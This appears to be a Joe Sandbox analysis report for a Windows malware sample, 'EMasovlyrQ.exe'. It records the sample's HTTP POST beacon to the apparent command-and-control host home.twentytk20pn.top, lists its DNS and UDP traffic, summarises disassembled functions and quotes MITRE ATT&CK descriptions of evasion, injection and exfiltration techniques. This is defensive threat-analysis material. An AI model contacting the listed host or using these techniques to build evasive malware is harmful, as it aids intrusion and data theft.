Source: global traffic	HTTP traffic detected: POST /WEIsmPfDcpBFJozngnYN1734366322 HTTP/1.1Host: home.twentytk20pn.topAccept: /Content-Type: application/jsonContent-Length: 143Data Raw: 7b 20 22 69 64 31 22 3a 20 22 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 5c 2f 68 31 3e 5c 6e 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 5c 6e 3c 5c 2f 62 6f 64 79 3e 3c 5c 2f 68 74 6d 6c 3e 5c 6e 22 2c 20 22 64 61 74 61 22 3a 20 22 44 6f 6e 65 31 22 20 7d Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	DNS traffic detected: DNS query: httpbin.org
Source: global traffic	DNS traffic detected: DNS query: home.twentytk20pn.top

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
Tactics:	Lateral Movement
Data Sources:	Application Log: Application Log Content, Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report EMasovlyrQ.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Exploits

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Boot Survival

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTP Packets

HTTPS Proxied Packets

Windows Analysis Report
EMasovlyrQ.exe

Function 0097255D Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 282
fileCOMMON

Function 009729FF Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 321
registryfileCOMMON

Function 009805B0 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 377
networkCOMMON

Function 00986FA0 Relevance: 6.3, APIs: 4, Instructions: 261
COMMON

Function 00A3B180 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 323
COMMON

Function 00A39740 Relevance: 18.2, APIs: 3, Strings: 7, Instructions: 743
registryCOMMON

Function 009A8B50 Relevance: 14.3, APIs: 3, Strings: 5, Instructions: 269
networkCOMMON

Function 00972F17 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 144
registryCOMMON

Function 009A9290 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 146
networkCOMMON

Function 009776A0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 73
networkCOMMON

Function 00CFD1B0 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 399
COMMON

Function 00977770 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 73
networkCOMMON

Function 009775E0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 66
networkCOMMON

Function 00CF8E90 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 125
COMMON

Function 009AA150 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 80
COMMON

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre